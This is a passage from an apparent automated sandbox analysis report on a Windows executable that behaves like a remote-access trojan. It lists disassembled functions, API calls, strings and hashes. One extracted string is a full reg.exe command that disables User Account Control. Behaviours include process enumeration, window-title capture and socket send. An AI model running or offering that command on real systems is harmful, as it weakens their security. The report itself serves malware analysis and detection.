                                                                                                                                                                                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                                                              • API String ID: 2922976086-4183131282
                                                                                                                                                                                              • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                                                                                              • Instruction ID: df89934bb1b0a8a8050eda01f74e4a29103dee5852f25f58c468be6e25eb4aa4
                                                                                                                                                                                              • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 22F090B69402ADBACB30ABD69C0EFCF7F3CEBC5B10F00042AB605A6051D6705144CAB8
                                                                                                                                                                                              Function 004425E9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 00442609
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044261C
                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 0044263F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                              • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                                                                              • Instruction ID: e7b95c4573467c94f6f12cd45ce5b447d53bb0dab0bc43500ba4ddd7032d9ec5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                                                                                                              • Instruction Fuzzy Hash: 99F04430A04209FBDB119F95ED09B9EBFB5EB08756F4140B9F805A2251DF749D41CA9C
                                                                                                                                                                                              Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B90,0040483F,00000001,?,?,00000000,00475B90,004017F3), ref: 00404AED
                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404AF9
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B90,004017F3), ref: 00404B04
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404B0D
                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                                                              • String ID: KeepAlive | Disabled
                                                                                                                                                                                              • API String ID: 2993684571-305739064
                                                                                                                                                                                              • Opcode ID: 2cc075cb119ee8d6e4de5a14164720dea666ca3e2be281d72593d3d64a36cd39
                                                                                                                                                                                              • Instruction ID: 6d19fc1829a92c7d53a4a1495ceb054f41c43dbe57a1f104861afa743dff4d10
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2cc075cb119ee8d6e4de5a14164720dea666ca3e2be281d72593d3d64a36cd39
                                                                                                                                                                                              • Instruction Fuzzy Hash: CDF0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890C75A
                                                                                                                                                                                              Function 00419F42 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F74
                                                                                                                                                                                              • PlaySoundW.WINMM(00000000,00000000), ref: 00419F82
                                                                                                                                                                                              • Sleep.KERNEL32(00002710), ref: 00419F89
                                                                                                                                                                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F92
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                                                                              • String ID: Alarm triggered
                                                                                                                                                                                              • API String ID: 614609389-2816303416
                                                                                                                                                                                              • Opcode ID: 1ef63bee03865bcc08a608bec94dcd8ab4bbdfcd0b6f3edb2fc09791d833004d
                                                                                                                                                                                              • Instruction ID: 9f384250976fc0018356f16acd63f039c2840ecbd7916ddbe948a6dbceb933d3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ef63bee03865bcc08a608bec94dcd8ab4bbdfcd0b6f3edb2fc09791d833004d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AE09A22A0422037862033BA7C0FC2F3E28DAC6B71B4000BFF905A61A2AE540810C6FB
                                                                                                                                                                                              Function 0041BE7F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF12), ref: 0041BE89
                                                                                                                                                                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BE96
                                                                                                                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF12), ref: 0041BEA3
                                                                                                                                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BEB6
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BEA9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                                                                                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                                                                                              • API String ID: 3024135584-2418719853
                                                                                                                                                                                              • Opcode ID: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                                                                                                                                                                              • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                                                                                                              • Opcode Fuzzy Hash: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                                                                                                                                                                              • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                                                                                                              Function 0044017A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                                                                                                                                                              • Instruction ID: 7508e0c950cfb5c07cf094bbf9e96825b82cecf32722f8b1b9d99ff1c2b3a0ae
                                                                                                                                                                                              • Opcode Fuzzy Hash: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0171C5319043169BEB21CF55C884ABFBB75FF51360F14426BEE50A7281C7B89C61CBA9
                                                                                                                                                                                              Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                                                                                                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                                                                                                              • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3525466593-0
                                                                                                                                                                                              • Opcode ID: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                                                                                                                                                                              • Instruction ID: 8d6069787765cd8089b920b9a1774e70d04059e2b0db351aafb66b48fc3d0dee
                                                                                                                                                                                              • Opcode Fuzzy Hash: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3161C370200301ABD720DF66C981BA77BA6BF44744F04411AF9058B786EBF8E8C5CB99
                                                                                                                                                                                              Function 0040E6A3 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                                                                                                                • Part of subcall function 0041B197: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B1AC
                                                                                                                                                                                                • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                                                                                                                • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4269425633-0
                                                                                                                                                                                              • Opcode ID: 122ce0d90df0b48e24d728a99b2962e5ce1622f1701a582d9c233ec2db2507e3
                                                                                                                                                                                              • Instruction ID: d2ffcfca6af8ede7debefd7e7f3e1a30d02436113b149e9281f59cd47d6ae75e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 122ce0d90df0b48e24d728a99b2962e5ce1622f1701a582d9c233ec2db2507e3
                                                                                                                                                                                              • Instruction Fuzzy Hash: FE41E0311083415BC325F761D8A1AEFB7E9AFA4305F50453EF449931E1EF389949C65A
                                                                                                                                                                                              Function 004430A8 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                              • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                                                                                              • Instruction ID: 83c4e6e90d702b2f07d890eb74d666dbf881ebcc09a41958ef300e35f10bd01d
                                                                                                                                                                                              • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6041F732A002049FEB24DF79C881A5EB7B5EF89718F1585AEE515EB341DB35EE01CB84
                                                                                                                                                                                              Function 0044FEE3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63), ref: 0044FF30
                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 0044FF68
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?), ref: 0044FFB9
                                                                                                                                                                                              • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?,00000002,?), ref: 0044FFCB
                                                                                                                                                                                              • __freea.LIBCMT ref: 0044FFD4
                                                                                                                                                                                                • Part of subcall function 00446B0F: HeapAlloc.KERNEL32(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1857427562-0
                                                                                                                                                                                              • Opcode ID: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                                                                                                                                                              • Instruction ID: e1bca46ef404bc628c8ce9314a93e43560c5f9fd50e6ec62d56fad3e85d1de09
                                                                                                                                                                                              • Opcode Fuzzy Hash: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                                                                                                                                                              • Instruction Fuzzy Hash: B731DC32A0020AABEB248F65DC81EAF7BA5EB01314F04417AFC05D7251E739DD59CBA8
                                                                                                                                                                                              Function 0044E14B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0044E154
                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E177
                                                                                                                                                                                                • Part of subcall function 00446B0F: HeapAlloc.KERNEL32(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E19D
                                                                                                                                                                                              • _free.LIBCMT ref: 0044E1B0
                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1BF
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2278895681-0
                                                                                                                                                                                              • Opcode ID: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                                                                                                                                                              • Instruction ID: 6461b62384d036c2086eeacc55d57ac9fa1e09cc40192d7ba399f745acfb761f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7301D4726417117F33215AB76C8CC7B7A6DEAC6FA5319013AFC04D2241DA788C0291B9
                                                                                                                                                                                              Function 0044F7AD Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _free.LIBCMT ref: 0044F7C5
                                                                                                                                                                                                • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                              • _free.LIBCMT ref: 0044F7D7
                                                                                                                                                                                              • _free.LIBCMT ref: 0044F7E9
                                                                                                                                                                                              • _free.LIBCMT ref: 0044F7FB
                                                                                                                                                                                              • _free.LIBCMT ref: 0044F80D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                              • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                                                                              • Instruction ID: 070623068f58a673a03bb4c9f7ddd8597c716d05cca38f31fa25b5a97b2bc473
                                                                                                                                                                                              • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                                                                              • Instruction Fuzzy Hash: CBF01232505610ABA620EB59F9C1C1773EAEA427247A5882BF048F7A41C77DFCC0866C
                                                                                                                                                                                              Function 004432F7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _free.LIBCMT ref: 00443315
                                                                                                                                                                                                • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                              • _free.LIBCMT ref: 00443327
                                                                                                                                                                                              • _free.LIBCMT ref: 0044333A
                                                                                                                                                                                              • _free.LIBCMT ref: 0044334B
                                                                                                                                                                                              • _free.LIBCMT ref: 0044335C
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                              • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                                                                              • Instruction ID: ba617ab3bec5ed021708e8d9793ec2f19a393bb4d037fa002b455214101d6763
                                                                                                                                                                                              • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                                                                              • Instruction Fuzzy Hash: E1F03AB08075208FA712AF6DBD014493BA1F706764342513BF41AB2A71EB780D81DA8E
                                                                                                                                                                                              Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                                                                                                              • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                                                                                                                • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                                                                                                                • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                                                                                                              • String ID: (FG
                                                                                                                                                                                              • API String ID: 3142014140-2273637114
                                                                                                                                                                                              • Opcode ID: 2df5b7247e134e06dd7043dd5c8eaa1a5c685bf3cd12a85f085cecee1c099086
                                                                                                                                                                                              • Instruction ID: 0f4eca603db080fccf2d1fd4ef2663101a063c6717372172f7cb8e83fece0a9a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2df5b7247e134e06dd7043dd5c8eaa1a5c685bf3cd12a85f085cecee1c099086
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4871E5321082454AC325FB61D8A5ADFB3E4AFE4308F50453EF58A530E1EF746A49CB9A
                                                                                                                                                                                              Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                                                                                                                • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                                                                                                                • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                                                                                                                • Part of subcall function 0041B6BA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6CF
                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                                                                                                              • String ID: XCG$`AG$>G
                                                                                                                                                                                              • API String ID: 2334542088-2372832151
                                                                                                                                                                                              • Opcode ID: 8f018178615ad669a06aab09822f46d5c943072692d9fb390c6fa8797f9b4d49
                                                                                                                                                                                              • Instruction ID: 51992e77998e29381c1adf086b38d2340c1e01042c89ae8fe5bc0f900910b53e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f018178615ad669a06aab09822f46d5c943072692d9fb390c6fa8797f9b4d49
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E5132321042405AC325F775D8A2AEF73E5ABE4308F50493FF94A631E2EE785949C69E
                                                                                                                                                                                              Function 004426E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\4XYAW8PbZH.exe,00000104), ref: 00442724
                                                                                                                                                                                              • _free.LIBCMT ref: 004427EF
                                                                                                                                                                                              • _free.LIBCMT ref: 004427F9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\4XYAW8PbZH.exe
                                                                                                                                                                                              • API String ID: 2506810119-3692865632
                                                                                                                                                                                              • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                                                                                                                                                              • Instruction ID: a09326ba0634f9fc59332e3a0850bb80beab61cea56b0999b5ec2e0ea5ed553b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                                                                                                                                                              • Instruction Fuzzy Hash: 04318075A00218AFEB21DF999D8199EBBFCEB85354B50406BF80497311D6B88E81CB59
                                                                                                                                                                                              Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
